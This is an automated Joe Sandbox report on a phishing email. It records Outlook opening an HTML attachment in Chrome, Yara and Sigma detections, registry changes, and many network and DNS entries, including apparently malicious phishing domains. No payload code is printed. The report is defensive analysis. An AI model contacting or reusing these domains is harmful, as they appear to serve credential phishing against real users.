Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
phish_alert_sp2_2.0.0.0.eml

Overview

General Information

Sample name:phish_alert_sp2_2.0.0.0.eml
Analysis ID:1528941
MD5:6f4ff2c8e1e2d9f883dfa7f6777dc468
SHA1:662e71a653730109aeab1c74600d323df11361cc
SHA256:d6dc432815634acc0b22c66929f2b4e831442a0920b8c424e4b702125af43c49
Infos:

Detection

Phisher
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Phisher
HTML body with high number of large embedded background images detected
HTML page contains hidden javascript code
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 7024 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_sp2_2.0.0.0.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 2724 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D344D994-EE2F-4A00-9D9F-9EE0EA25E9D6" "57595C43-C7DC-4AA9-ADCB-EBC4A2124A79" "7024" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\IZMN0LFD\Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,10352928630655094259,13753120291753910830,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_186JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 2, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Outlook\AddinsData\ColleagueImport.ColleagueImportAddin\LoadCount
    Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\IZMN0LFD\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_186, type: DROPPED
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.htmlHTTP Parser: Total embedded background img size: 627312
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.htmlHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.htmlHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.16:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49846 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 20MB later: 36MB
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: global trafficDNS traffic detected: DNS query: 40lzzyxj.banquetesaraucania.cc
    Source: global trafficDNS traffic detected: DNS query: en.wikipedia.org
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
    Source: global trafficDNS traffic detected: DNS query: meta.wikimedia.org
    Source: global trafficDNS traffic detected: DNS query: login.wikimedia.org
    Source: global trafficDNS traffic detected: DNS query: fvi5np.tgardtorveni.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: xmymbshctq0yrufobyi4rhh5pb7rbmlpbry0hnlxy2jafbrmj5sr4upab4a.tubeawelm.ru
    Source: global trafficDNS traffic detected: DNS query: yahoo.com
    Source: global trafficDNS traffic detected: DNS query: www.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: csp.yahoo.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.16:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49846 version: TLS 1.2
    Source: classification engineClassification label: mal48.phis.winEML@24/90@42/206
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
